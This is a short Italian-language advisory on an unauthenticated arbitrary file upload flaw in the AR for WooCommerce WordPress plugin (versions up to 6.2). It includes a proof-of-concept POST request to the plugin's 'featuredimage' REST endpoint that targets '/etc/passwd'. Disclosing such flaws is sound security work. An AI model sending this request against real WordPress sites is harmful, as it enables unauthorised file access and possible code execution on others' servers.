
AR For Woocommerce <= 6.2 - Caricamento arbitrario di file non autenticato
AR For Woocommerce <= 6.2 - Caricamento arbitrario di file senza autenticazione
Il plugin AR for WooCommerce per WordPress è vulnerabile a caricamenti arbitrari di file a causa della mancata validazione del tipo di file in tutte le versioni fino alla 6.2 inclusa. Ciò consente a attaccanti non autenticati di caricare file arbitrari sul server del sito interessato, rendendo possibile l'esecuzione remota di codice.
POST /wp-json/ar-wc-display/featuredimage/ HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/json
Content-Length: 41
{"id":123,"featured_image":"/etc/passwd"}